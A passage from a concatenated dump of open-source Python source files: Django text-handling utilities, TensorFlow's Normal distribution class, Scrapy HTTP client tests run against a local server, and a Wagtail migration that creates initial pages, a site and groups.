if truncate is None:
truncate = pgettext(
'String to return when truncating text',
'%(truncated_text)s...')
truncate = force_text(truncate)
if '%(truncated_text)s' in truncate:
return truncate % {'truncated_text': text}
# The truncation text didn't contain the %(truncated_text)s string
# replacement argument so just append it to the text.
if text.endswith(truncate):
# But don't append the truncation text if the current text already
# ends in this.
return text
return '%s%s' % (text, truncate)
def chars(self, num, truncate=None):
"""
Returns the text truncated to be no longer than the specified number
of characters.
Takes an optional argument of what should be used to notify that the
string has been truncated, defaulting to a translatable string of an
ellipsis (...).
"""
length = int(num)
text = unicodedata.normalize('NFC', self._wrapped)
# Calculate the length to truncate to (max length - end_text length)
truncate_len = length
for char in self.add_truncation_text('', truncate):
if not unicodedata.combining(char):
truncate_len -= 1
if truncate_len == 0:
break
s_len = 0
end_index = None
for i, char in enumerate(text):
if unicodedata.combining(char):
# Don't consider combining characters
# as adding to the string length
continue
s_len += 1
if end_index is None and s_len > truncate_len:
end_index = i
if s_len > length:
# Return the truncated string
return self.add_truncation_text(text[:end_index or 0],
truncate)
# Return the original string since no truncation was necessary
return text
chars = allow_lazy(chars)
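# Worked example (editor's sketch): with the default '...' truncation text,
# num=7 leaves a budget of 7 - 3 = 4 visible characters plus the ellipsis.
#
#   >>> Truncator('Hello World').chars(7)
#   'Hell...'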
def words(self, num, truncate=None, html=False):
"""
Truncates a string after a certain number of words. Takes an optional
argument of what should be used to notify that the string has been
truncated, defaulting to ellipsis (...).
"""
length = int(num)
if html:
return self._html_words(length, truncate)
return self._text_words(length, truncate)
words = allow_lazy(words)
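# Example (editor's sketch): the truncation text is appended only when words
# are actually dropped.
#
#   >>> Truncator('a b c d').words(3)
#   'a b c...'
#   >>> Truncator('a b').words(3)
#   'a b'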
def _text_words(self, length, truncate):
"""
Truncates a string after a certain number of words.
Newlines in the string will be stripped.
"""
words = self._wrapped.split()
if len(words) > length:
words = words[:length]
return self.add_truncation_text(' '.join(words), truncate)
return ' '.join(words)
def _html_words(self, length, truncate):
"""
Truncates HTML to a certain number of words (not counting tags and
comments). Closes opened tags if they were correctly closed in the
given HTML.
Newlines in the HTML are preserved.
"""
if length <= 0:
return ''
html4_singlets = (
'br', 'col', 'link', 'base', 'img',
'param', 'area', 'hr', 'input'
)
# Count non-HTML words and keep note of open tags
pos = 0
end_text_pos = 0
words = 0
open_tags = []
while words <= length:
m = re_words.search(self._wrapped, pos)
if not m:
# Checked through whole string
break
pos = m.end(0)
if m.group(1):
# It's an actual non-HTML word
words += 1
if words == length:
end_text_pos = pos
continue
# Check for tag
tag = re_tag.match(m.group(0))
if not tag or end_text_pos:
# Don't worry about non tags or tags after our truncate point
continue
closing_tag, tagname, self_closing = tag.groups()
# Element names are always case-insensitive
tagname = tagname.lower()
if self_closing or tagname in html4_singlets:
pass
elif closing_tag:
# Check for match in open tags list
try:
i = open_tags.index(tagname)
except ValueError:
pass
else:
# SGML: An end tag closes, back to the matching start tag,
# all unclosed intervening start tags with omitted end tags
open_tags = open_tags[i + 1:]
else:
# Add it to the start of the open tags list
open_tags.insert(0, tagname)
if words <= length:
# Don't try to close tags if we don't need to truncate
return self._wrapped
out = self._wrapped[:end_text_pos]
truncate_text = self.add_truncation_text('', truncate)
if truncate_text:
out += truncate_text
# Close any tags still open
for tag in open_tags:
out += '</%s>' % tag
# Return string
return out
def get_valid_filename(s):
"""
Returns the given string converted to a string that can be used for a clean
filename. Specifically, leading and trailing spaces are removed; other
spaces are converted to underscores; and anything that is not a unicode
alphanumeric, dash, underscore, or dot, is removed.
>>> get_valid_filename("john's portrait in 2004.jpg")
'johns_portrait_in_2004.jpg'
"""
s = force_text(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
get_valid_filename = allow_lazy(get_valid_filename, six.text_type)
def get_text_list(list_, last_word=ugettext_lazy('or')):
"""
>>> get_text_list(['a', 'b', 'c', 'd'])
'a, b, c or d'
>>> get_text_list(['a', 'b', 'c'], 'and')
'a, b and c'
>>> get_text_list(['a', 'b'], 'and')
'a and b'
>>> get_text_list(['a'])
'a'
>>> get_text_list([])
''
"""
if len(list_) == 0: return ''
if len(list_) == 1: return force_text(list_[0])
return '%s %s %s' % (
# Translators: This string is used as a separator between list elements
_(', ').join([force_text(i) for i in list_][:-1]),
force_text(last_word), force_text(list_[-1]))
get_text_list = allow_lazy(get_text_list, six.text_type)
def normalize_newlines(text):
return force_text(re.sub(r'\r\n|\r|\n', '\n', text))
normalize_newlines = allow_lazy(normalize_newlines, six.text_type)
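# Example (editor's sketch): mixed Mac/Windows/Unix line endings collapse to
# posix newlines.
#
#   >>> normalize_newlines('a\r\nb\rc\nd')
#   'a\nb\nc\nd'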
def recapitalize(text):
"Recapitalizes text, placing caps after end-of-sentence punctuation."
text = force_text(text).lower()
capsRE = re.compile(r'(?:^|(?<=[\.\?\!] ))([a-z])')
text = capsRE.sub(lambda x: x.group(1).upper(), text)
return text
recapitalize = allow_lazy(recapitalize)
def phone2numeric(phone):
"Converts a phone number with letters into its numeric equivalent."
char2number = {'a': '2', 'b': '2', 'c': '2', 'd': '3', 'e': '3', 'f': '3',
'g': '4', 'h': '4', 'i': '4', 'j': '5', 'k': '5', 'l': '5', 'm': '6',
'n': '6', 'o': '6', 'p': '7', 'q': '7', 'r': '7', 's': '7', 't': '8',
'u': '8', 'v': '8', 'w': '9', 'x': '9', 'y': '9', 'z': '9',
}
return ''.join(char2number.get(c, c) for c in phone.lower())
phone2numeric = allow_lazy(phone2numeric)
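# Example (editor's sketch): letters map to their keypad digits; any other
# character passes through unchanged.
#
#   >>> phone2numeric('0800 flowers')
#   '0800 3569377'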
# From http://www.xhaus.com/alan/python/httpcomp.html#gzip
# Used with permission.
def compress_string(s):
zbuf = BytesIO()
zfile = GzipFile(mode='wb', compresslevel=6, fileobj=zbuf)
zfile.write(s)
zfile.close()
return zbuf.getvalue()
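# Round-trip sketch (editor's addition; assumes a bytes payload):
#
#   >>> data = compress_string(b'x' * 1000)
#   >>> GzipFile(fileobj=BytesIO(data)).read() == b'x' * 1000
#   True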
class StreamingBuffer(object):
def __init__(self):
self.vals = []
def write(self, val):
self.vals.append(val)
def read(self):
ret = b''.join(self.vals)
self.vals = []
return ret
def flush(self):
return
def close(self):
return
# Like compress_string, but for iterators of strings.
def compress_sequence(sequence):
buf = StreamingBuffer()
zfile = GzipFile(mode='wb', compresslevel=6, fileobj=buf)
# Output headers...
yield buf.read()
for item in sequence:
zfile.write(item)
zfile.flush()
yield buf.read()
zfile.close()
yield buf.read()
ustring_re = re.compile("([\u0080-\uffff])")
def javascript_quote(s, quote_double_quotes=False):
def fix(match):
return "\\u%04x" % ord(match.group(1))
if type(s) == bytes:
s = s.decode('utf-8')
elif type(s) != six.text_type:
raise TypeError(s)
s = s.replace('\\', '\\\\')
s = s.replace('\r', '\\r')
s = s.replace('\n', '\\n')
s = s.replace('\t', '\\t')
s = s.replace("'", "\\'")
if quote_double_quotes:
s = s.replace('"', '&quot;')
return str(ustring_re.sub(fix, s))
javascript_quote = allow_lazy(javascript_quote, six.text_type)
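# Example (editor's sketch): backslashes, control characters, and single
# quotes are escaped for embedding in a single-quoted JS literal, and
# non-ASCII code points become \uXXXX escapes.
#
#   >>> javascript_quote("don't\n")
#   "don\\'t\\n"
#   >>> javascript_quote('caf\xe9')
#   'caf\\u00e9'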
# Expression to match some_token and some_token="with spaces" (and similarly
# for single-quoted strings).
smart_split_re = re.compile(r"""
((?:
[^\s'"]*
(?:
(?:"(?:[^"\\]|\\.)*" | '(?:[^'\\]|\\.)*')
[^\s'"]*
)+
) | \S+)
""", re.VERBOSE)
def smart_split(text):
r"""
Generator that splits a string by spaces, leaving quoted phrases together.
Supports both single and double quotes, and supports escaping quotes with
backslashes. In the output, strings will keep their initial and trailing
quote marks and escaped quotes will remain escaped (the results can then
be further processed with unescape_string_literal()).
>>> list(smart_split(r'This is "a person\'s" test.'))
['This', 'is', '"a person\\\'s"', 'test.']
>>> list(smart_split(r"Another 'person\'s' test."))
['Another', "'person\\'s'", 'test.']
>>> list(smart_split(r'A "\"funky\" style" test.'))
['A', '"\\"funky\\" style"', 'test.']
"""
text = force_text(text)
for bit in smart_split_re.finditer(text):
yield bit.group(0)
def _replace_entity(match):
text = match.group(1)
if text[0] == '#':
text = text[1:]
try:
if text[0] in 'xX':
c = int(text[1:], 16)
else:
c = int(text)
return six.unichr(c)
except ValueError:
return match.group(0)
else:
try:
return six.unichr(html_entities.name2codepoint[text])
except (ValueError, KeyError):
return match.group(0)
_entity_re = re.compile(r"&(#?[xX]?(?:[0-9a-fA-F]+|\w{1,8}));")
def unescape_entities(text):
return _entity_re.sub(_replace_entity, text)
unescape_entities = allow_lazy(unescape_entities, six.text_type)
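# Example (editor's sketch): named, decimal, and hex character references all
# resolve, while unknown names are left untouched; e.g.
# unescape_entities('&amp; &#960; &#x3C0; &bogus;') yields '& π π &bogus;'.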
def unescape_string_literal(s):
r"""
Convert quoted string literals to unquoted strings with escaped quotes and
backslashes unquoted::
>>> unescape_string_literal('"abc"')
'abc'
>>> unescape_string_literal("'abc'")
'abc'
>>> unescape_string_literal('"a \"bc\""')
'a "bc"'
>>> unescape_string_literal("'\'ab\' c'")
"'ab' c"
"""
if s[0] not in "\"'" or s[-1] != s[0]:
raise ValueError("Not a string literal: %r" % s)
quote = s[0]
return s[1:-1].replace(r'\%s' % quote, quote).replace(r'\\', '\\')
unescape_string_literal = allow_lazy(unescape_string_literal)
def slugify(value):
"""
Converts to lowercase, removes non-word characters (alphanumerics and
underscores) and converts spaces to hyphens. Also strips leading and
trailing whitespace.
"""
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')
value = re.sub('[^\w\s-]', '', value).strip().lower()
return mark_safe(re.sub('[-\s]+', '-', value))
slugify = allow_lazy(slugify, six.text_type)
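# Example (editor's sketch): punctuation is dropped and runs of whitespace or
# hyphens collapse to single hyphens.
#
#   >>> slugify(' Joel is a slug! ')
#   'joel-is-a-slug'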
|
ingadhoc/product
|
refs/heads/13.0
|
product_uoms_sale/models/__init__.py
|
1
|
##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from . import product_uoms
from . import product_product
from . import sale_order_line
|
alheinecke/tensorflow-xsmm
|
refs/heads/master
|
tensorflow/contrib/distributions/python/ops/normal.py
|
7
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Normal (Gaussian) distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import kullback_leibler
from tensorflow.contrib.distributions.python.ops import special_math
from tensorflow.contrib.framework.python.framework import tensor_util as contrib_tensor_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
__all__ = [
"Normal",
"NormalWithSoftplusScale",
]
class Normal(distribution.Distribution):
"""The Normal distribution with location `loc` and `scale` parameters.
#### Mathematical details
The probability density function (pdf) is,
```none
pdf(x; mu, sigma) = exp(-0.5 (x - mu)**2 / sigma**2) / Z
Z = (2 pi sigma**2)**0.5
```
where `loc = mu` is the mean, `scale = sigma` is the std. deviation, and `Z`
is the normalization constant.
The Normal distribution is a member of the [location-scale family](
https://en.wikipedia.org/wiki/Location-scale_family), i.e., it can be
constructed as,
```none
X ~ Normal(loc=0, scale=1)
Y = loc + scale * X
```
#### Examples
Examples of initialization of one or a batch of distributions.
```python
# Define a single scalar Normal distribution.
dist = tf.contrib.distributions.Normal(loc=0., scale=3.)
# Evaluate the cdf at 1, returning a scalar.
dist.cdf(1.)
# Define a batch of two scalar valued Normals.
# The first has mean 1 and standard deviation 11, the second 2 and 22.
dist = tf.contrib.distributions.Normal(loc=[1, 2.], scale=[11, 22.])
# Evaluate the pdf of the first distribution on 0, and the second on 1.5,
# returning a length two tensor.
dist.prob([0, 1.5])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
Arguments are broadcast when possible.
```python
# Define a batch of two scalar valued Normals.
# Both have mean 1, but different standard deviations.
dist = tf.contrib.distributions.Normal(loc=1., scale=[11, 22.])
# Evaluate the pdf of both distributions on the same point, 3.0,
# returning a length 2 tensor.
dist.prob(3.0)
```
"""
def __init__(self,
loc,
scale,
validate_args=False,
allow_nan_stats=True,
name="Normal"):
"""Construct Normal distributions with mean and stddev `loc` and `scale`.
The parameters `loc` and `scale` must be shaped in a way that supports
broadcasting (e.g. `loc + scale` is a valid operation).
Args:
loc: Floating point tensor; the means of the distribution(s).
scale: Floating point tensor; the stddevs of the distribution(s).
Must contain only positive values.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value "`NaN`" to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
Raises:
TypeError: if `loc` and `scale` have different `dtype`.
"""
parameters = locals()
with ops.name_scope(name, values=[loc, scale]) as ns:
with ops.control_dependencies([check_ops.assert_positive(scale)] if
validate_args else []):
self._loc = array_ops.identity(loc, name="loc")
self._scale = array_ops.identity(scale, name="scale")
contrib_tensor_util.assert_same_float_dtype([self._loc, self._scale])
super(Normal, self).__init__(
dtype=self._scale.dtype,
reparameterization_type=distribution.FULLY_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=[self._loc, self._scale],
name=ns)
@staticmethod
def _param_shapes(sample_shape):
return dict(
zip(("loc", "scale"), ([ops.convert_to_tensor(
sample_shape, dtype=dtypes.int32)] * 2)))
@property
def loc(self):
"""Distribution parameter for the mean."""
return self._loc
@property
def scale(self):
"""Distribution parameter for standard deviation."""
return self._scale
def _batch_shape_tensor(self):
return array_ops.broadcast_dynamic_shape(
array_ops.shape(self.loc),
array_ops.shape(self.scale))
def _batch_shape(self):
return array_ops.broadcast_static_shape(
self.loc.get_shape(),
self.scale.get_shape())
def _event_shape_tensor(self):
return constant_op.constant([], dtype=dtypes.int32)
def _event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
shape = array_ops.concat([[n], self.batch_shape_tensor()], 0)
sampled = random_ops.random_normal(
shape=shape, mean=0., stddev=1., dtype=self.loc.dtype, seed=seed)
return sampled * self.scale + self.loc
def _log_prob(self, x):
return self._log_unnormalized_prob(x) - self._log_normalization()
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _log_cdf(self, x):
return special_math.log_ndtr(self._z(x))
def _cdf(self, x):
return special_math.ndtr(self._z(x))
def _log_survival_function(self, x):
return special_math.log_ndtr(-self._z(x))
def _survival_function(self, x):
return special_math.ndtr(-self._z(x))
def _log_unnormalized_prob(self, x):
return -0.5 * math_ops.square(self._z(x))
def _log_normalization(self):
return 0.5 * math.log(2. * math.pi) + math_ops.log(self.scale)
def _entropy(self):
# Use broadcasting rules to calculate the full broadcast scale.
scale = self.scale * array_ops.ones_like(self.loc)
return 0.5 * math.log(2. * math.pi * math.e) + math_ops.log(scale)
def _mean(self):
return self.loc * array_ops.ones_like(self.scale)
def _stddev(self):
return self.scale * array_ops.ones_like(self.loc)
def _mode(self):
return self._mean()
def _z(self, x):
"""Standardize input `x` to a unit normal."""
with ops.name_scope("standardize", values=[x]):
return (x - self.loc) / self.scale
class NormalWithSoftplusScale(Normal):
"""Normal with softplus applied to `scale`."""
def __init__(self,
loc,
scale,
validate_args=False,
allow_nan_stats=True,
name="NormalWithSoftplusScale"):
parameters = locals()
with ops.name_scope(name, values=[scale]) as ns:
super(NormalWithSoftplusScale, self).__init__(
loc=loc,
scale=nn.softplus(scale, name="softplus_scale"),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=ns)
self._parameters = parameters
@kullback_leibler.RegisterKL(Normal, Normal)
def _kl_normal_normal(n_a, n_b, name=None):
"""Calculate the batched KL divergence KL(n_a || n_b) with n_a and n_b Normal.
Args:
n_a: instance of a Normal distribution object.
n_b: instance of a Normal distribution object.
name: (optional) Name to use for created operations.
default is "kl_normal_normal".
Returns:
Batchwise KL(n_a || n_b)
"""
with ops.name_scope(name, "kl_normal_normal", [n_a.loc, n_b.loc]):
one = constant_op.constant(1, dtype=n_a.dtype)
two = constant_op.constant(2, dtype=n_a.dtype)
half = constant_op.constant(0.5, dtype=n_a.dtype)
s_a_squared = math_ops.square(n_a.scale)
s_b_squared = math_ops.square(n_b.scale)
ratio = s_a_squared / s_b_squared
return (math_ops.square(n_a.loc - n_b.loc) / (two * s_b_squared) +
half * (ratio - one - math_ops.log(ratio)))
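# Worked check (editor's sketch, not part of the original file): for
# n_a = Normal(loc=0., scale=1.) and n_b = Normal(loc=1., scale=2.),
# ratio = 1/4 and the expression above evaluates to
#   (0 - 1)**2 / (2 * 4) + 0.5 * (0.25 - 1 - log(0.25)) ~= 0.4431,
# which matches the textbook closed form
#   log(s_b / s_a) + (s_a**2 + (mu_a - mu_b)**2) / (2 * s_b**2) - 0.5.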
|
stenskjaer/scrapy
|
refs/heads/master
|
tests/test_webclient.py
|
112
|
"""
Tests borrowed from the twisted.web.client tests.
"""
import os
from six.moves.urllib.parse import urlparse
from twisted.trial import unittest
from twisted.web import server, static, error, util
from twisted.internet import reactor, defer
from twisted.test.proto_helpers import StringTransport
from twisted.python.filepath import FilePath
from twisted.protocols.policies import WrappingFactory
from scrapy.core.downloader import webclient as client
from scrapy.http import Request, Headers
def getPage(url, contextFactory=None, *args, **kwargs):
"""Adapted version of twisted.web.client.getPage"""
def _clientfactory(*args, **kwargs):
timeout = kwargs.pop('timeout', 0)
f = client.ScrapyHTTPClientFactory(Request(*args, **kwargs), timeout=timeout)
f.deferred.addCallback(lambda r: r.body)
return f
from twisted.web.client import _makeGetterFactory
return _makeGetterFactory(url, _clientfactory,
contextFactory=contextFactory, *args, **kwargs).deferred
class ParseUrlTestCase(unittest.TestCase):
"""Test URL parsing facility and default values."""
def _parse(self, url):
f = client.ScrapyHTTPClientFactory(Request(url))
return (f.scheme, f.netloc, f.host, f.port, f.path)
def testParse(self):
lip = '127.0.0.1'
tests = (
("http://127.0.0.1?c=v&c2=v2#fragment", ('http', lip, lip, 80, '/?c=v&c2=v2')),
("http://127.0.0.1/?c=v&c2=v2#fragment", ('http', lip, lip, 80, '/?c=v&c2=v2')),
("http://127.0.0.1/foo?c=v&c2=v2#frag", ('http', lip, lip, 80, '/foo?c=v&c2=v2')),
("http://127.0.0.1:100?c=v&c2=v2#fragment", ('http', lip+':100', lip, 100, '/?c=v&c2=v2')),
("http://127.0.0.1:100/?c=v&c2=v2#frag", ('http', lip+':100', lip, 100, '/?c=v&c2=v2')),
("http://127.0.0.1:100/foo?c=v&c2=v2#frag", ('http', lip+':100', lip, 100, '/foo?c=v&c2=v2')),
("http://127.0.0.1", ('http', lip, lip, 80, '/')),
("http://127.0.0.1/", ('http', lip, lip, 80, '/')),
("http://127.0.0.1/foo", ('http', lip, lip, 80, '/foo')),
("http://127.0.0.1?param=value", ('http', lip, lip, 80, '/?param=value')),
("http://127.0.0.1/?param=value", ('http', lip, lip, 80, '/?param=value')),
("http://127.0.0.1:12345/foo", ('http', lip+':12345', lip, 12345, '/foo')),
("http://spam:12345/foo", ('http', 'spam:12345', 'spam', 12345, '/foo')),
("http://spam.test.org/foo", ('http', 'spam.test.org', 'spam.test.org', 80, '/foo')),
("https://127.0.0.1/foo", ('https', lip, lip, 443, '/foo')),
("https://127.0.0.1/?param=value", ('https', lip, lip, 443, '/?param=value')),
("https://127.0.0.1:12345/", ('https', lip+':12345', lip, 12345, '/')),
("http://scrapytest.org/foo ", ('http', 'scrapytest.org', 'scrapytest.org', 80, '/foo')),
("http://egg:7890 ", ('http', 'egg:7890', 'egg', 7890, '/')),
)
for url, test in tests:
self.assertEquals(client._parse(url), test, url)
def test_externalUnicodeInterference(self):
"""
L{client._parse} should return C{str} for the scheme, host, and path
elements of its return tuple, even when passed an URL which has
previously been passed to L{urlparse} as a C{unicode} string.
"""
badInput = u'http://example.com/path'
goodInput = badInput.encode('ascii')
urlparse(badInput)
scheme, netloc, host, port, path = self._parse(goodInput)
self.assertTrue(isinstance(scheme, str))
self.assertTrue(isinstance(netloc, str))
self.assertTrue(isinstance(host, str))
self.assertTrue(isinstance(path, str))
self.assertTrue(isinstance(port, int))
class ScrapyHTTPPageGetterTests(unittest.TestCase):
def test_earlyHeaders(self):
# basic test stolen from twisted HTTPageGetter
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar',
body="some data",
headers={
'Host': 'example.net',
'User-Agent': 'fooble',
'Cookie': 'blah blah',
'Content-Length': '12981',
'Useful': 'value'}))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Content-Length: 9\r\n"
"Useful: value\r\n"
"Connection: close\r\n"
"User-Agent: fooble\r\n"
"Host: example.net\r\n"
"Cookie: blah blah\r\n"
"\r\n"
"some data")
# test minimal sent headers
factory = client.ScrapyHTTPClientFactory(Request('http://foo/bar'))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"\r\n")
# test a simple POST with body and content-type
factory = client.ScrapyHTTPClientFactory(Request(
method='POST',
url='http://foo/bar',
body='name=value',
headers={'Content-Type': 'application/x-www-form-urlencoded'}))
self._test(factory,
"POST /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"Connection: close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 10\r\n"
"\r\n"
"name=value")
# test a POST method with no body provided
factory = client.ScrapyHTTPClientFactory(Request(
method='POST',
url='http://foo/bar'
))
self._test(factory,
"POST /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"Content-Length: 0\r\n"
"\r\n")
# test with single and multivalued headers
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar',
headers={
'X-Meta-Single': 'single',
'X-Meta-Multivalued': ['value1', 'value2'],
}))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"X-Meta-Multivalued: value1\r\n"
"X-Meta-Multivalued: value2\r\n"
"X-Meta-Single: single\r\n"
"\r\n")
# same test with single and multivalued headers but using Headers class
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar',
headers=Headers({
'X-Meta-Single': 'single',
'X-Meta-Multivalued': ['value1', 'value2'],
})))
self._test(factory,
"GET /bar HTTP/1.0\r\n"
"Host: foo\r\n"
"X-Meta-Multivalued: value1\r\n"
"X-Meta-Multivalued: value2\r\n"
"X-Meta-Single: single\r\n"
"\r\n")
def _test(self, factory, testvalue):
transport = StringTransport()
protocol = client.ScrapyHTTPPageGetter()
protocol.factory = factory
protocol.makeConnection(transport)
self.assertEqual(
set(transport.value().splitlines()),
set(testvalue.splitlines()))
return testvalue
def test_non_standard_line_endings(self):
# regression test for: http://dev.scrapy.org/ticket/258
factory = client.ScrapyHTTPClientFactory(Request(
url='http://foo/bar'))
protocol = client.ScrapyHTTPPageGetter()
protocol.factory = factory
protocol.headers = Headers()
protocol.dataReceived("HTTP/1.0 200 OK\n")
protocol.dataReceived("Hello: World\n")
protocol.dataReceived("Foo: Bar\n")
protocol.dataReceived("\n")
self.assertEqual(protocol.headers,
Headers({'Hello': ['World'], 'Foo': ['Bar']}))
from twisted.web.test.test_webclient import ForeverTakingResource, \
ErrorResource, NoLengthResource, HostHeaderResource, \
PayloadResource, BrokenDownloadResource
class WebClientTestCase(unittest.TestCase):
def _listen(self, site):
return reactor.listenTCP(0, site, interface="127.0.0.1")
def setUp(self):
name = self.mktemp()
os.mkdir(name)
FilePath(name).child("file").setContent("0123456789")
r = static.File(name)
r.putChild("redirect", util.Redirect("/file"))
r.putChild("wait", ForeverTakingResource())
r.putChild("error", ErrorResource())
r.putChild("nolength", NoLengthResource())
r.putChild("host", HostHeaderResource())
r.putChild("payload", PayloadResource())
r.putChild("broken", BrokenDownloadResource())
self.site = server.Site(r, timeout=None)
self.wrapper = WrappingFactory(self.site)
self.port = self._listen(self.wrapper)
self.portno = self.port.getHost().port
def tearDown(self):
return self.port.stopListening()
def getURL(self, path):
return "http://127.0.0.1:%d/%s" % (self.portno, path)
def testPayload(self):
s = "0123456789" * 10
return getPage(self.getURL("payload"), body=s).addCallback(self.assertEquals, s)
def testHostHeader(self):
# if we pass Host header explicitly, it should be used, otherwise
# it should extract from url
return defer.gatherResults([
getPage(self.getURL("host")).addCallback(self.assertEquals, "127.0.0.1:%d" % self.portno),
getPage(self.getURL("host"), headers={"Host": "www.example.com"}).addCallback(self.assertEquals, "www.example.com")])
def test_getPage(self):
"""
L{client.getPage} returns a L{Deferred} which is called back with
the body of the response if the default method B{GET} is used.
"""
d = getPage(self.getURL("file"))
d.addCallback(self.assertEquals, "0123456789")
return d
def test_getPageHead(self):
"""
L{client.getPage} returns a L{Deferred} which is called back with
the empty string if the method is C{HEAD} and there is a successful
response code.
"""
def _getPage(method):
return getPage(self.getURL("file"), method=method)
return defer.gatherResults([
_getPage("head").addCallback(self.assertEqual, ""),
_getPage("HEAD").addCallback(self.assertEqual, "")])
def test_timeoutNotTriggering(self):
"""
When a non-zero timeout is passed to L{getPage} and the page is
retrieved before the timeout period elapses, the L{Deferred} is
called back with the contents of the page.
"""
d = getPage(self.getURL("host"), timeout=100)
d.addCallback(self.assertEquals, "127.0.0.1:%d" % self.portno)
return d
def test_timeoutTriggering(self):
"""
When a non-zero timeout is passed to L{getPage} and that many
        seconds elapse before the server responds to the request, the
        L{Deferred} is errbacked with a L{defer.TimeoutError}.
"""
finished = self.assertFailure(
getPage(self.getURL("wait"), timeout=0.000001),
defer.TimeoutError)
def cleanup(passthrough):
# Clean up the server which is hanging around not doing
# anything.
connected = self.wrapper.protocols.keys()
# There might be nothing here if the server managed to already see
# that the connection was lost.
if connected:
connected[0].transport.loseConnection()
return passthrough
finished.addBoth(cleanup)
return finished
def testNotFound(self):
return getPage(self.getURL('notsuchfile')).addCallback(self._cbNoSuchFile)
def _cbNoSuchFile(self, pageData):
self.assert_('404 - No Such Resource' in pageData)
def testFactoryInfo(self):
url = self.getURL('file')
scheme, netloc, host, port, path = client._parse(url)
factory = client.ScrapyHTTPClientFactory(Request(url))
reactor.connectTCP(host, port, factory)
return factory.deferred.addCallback(self._cbFactoryInfo, factory)
def _cbFactoryInfo(self, ignoredResult, factory):
self.assertEquals(factory.status, '200')
self.assert_(factory.version.startswith('HTTP/'))
self.assertEquals(factory.message, 'OK')
self.assertEquals(factory.response_headers['content-length'], '10')
def testRedirect(self):
return getPage(self.getURL("redirect")).addCallback(self._cbRedirect)
def _cbRedirect(self, pageData):
self.assertEquals(pageData,
'\n<html>\n <head>\n <meta http-equiv="refresh" content="0;URL=/file">\n'
' </head>\n <body bgcolor="#FFFFFF" text="#000000">\n '
'<a href="/file">click here</a>\n </body>\n</html>\n')
|
takeflight/wagtail
|
refs/heads/master
|
wagtail/core/migrations/0002_initial_data.py
|
24
|
# -*- coding: utf-8 -*-
from django.db import migrations
def initial_data(apps, schema_editor):
ContentType = apps.get_model('contenttypes.ContentType')
Group = apps.get_model('auth.Group')
Page = apps.get_model('wagtailcore.Page')
Site = apps.get_model('wagtailcore.Site')
GroupPagePermission = apps.get_model('wagtailcore.GroupPagePermission')
# Create page content type
page_content_type, created = ContentType.objects.get_or_create(
model='page',
app_label='wagtailcore'
)
# Create root page
root = Page.objects.create(
title="Root",
slug='root',
content_type=page_content_type,
path='0001',
depth=1,
numchild=1,
url_path='/',
)
# Create homepage
homepage = Page.objects.create(
title="Welcome to your new Wagtail site!",
slug='home',
content_type=page_content_type,
path='00010001',
depth=2,
numchild=0,
url_path='/home/',
)
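    # Editorial note (not part of the original migration): 'path' follows
    # django-treebeard's materialized-path convention of fixed 4-character
    # steps, so root is '0001' at depth 1 and its first child is '00010001'
    # at depth 2. 'numchild' is maintained by hand here because
    # apps.get_model() returns a historical model without treebeard's
    # tree-management methods.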
# Create default site
Site.objects.create(
hostname='localhost',
root_page_id=homepage.id,
is_default_site=True
)
# Create auth groups
moderators_group = Group.objects.create(name='Moderators')
editors_group = Group.objects.create(name='Editors')
# Create group permissions
GroupPagePermission.objects.create(
group=moderators_group,
page=root,
permission_type='add',
)
GroupPagePermission.objects.create(
group=moderators_group,
page=root,
permission_type='edit',
)
GroupPagePermission.objects.create(
group=moderators_group,
page=root,
permission_type='publish',
)
GroupPagePermission.objects.create(
group=editors_group,
page=root,
permission_type='add',
)
GroupPagePermission.objects.create(
group=editors_group,
page=root,
permission_type='edit',
)
def remove_initial_data(apps, schema_editor):
"""This function does nothing. The below code is commented out together
with an explanation of why we don't need to bother reversing any of the
initial data"""
pass
# This does not need to be deleted, Django takes care of it.
# page_content_type = ContentType.objects.get(
# model='page',
# app_label='wagtailcore',
# )
# Page objects: Do nothing, the table will be deleted when reversing 0001
# Do not reverse Site creation since other models might depend on it
# Remove auth groups -- is this safe? External objects might depend
# on these groups... seems unsafe.
# Group.objects.filter(
# name__in=('Moderators', 'Editors')
# ).delete()
#
# Likewise, we're leaving all GroupPagePermission unchanged as users may
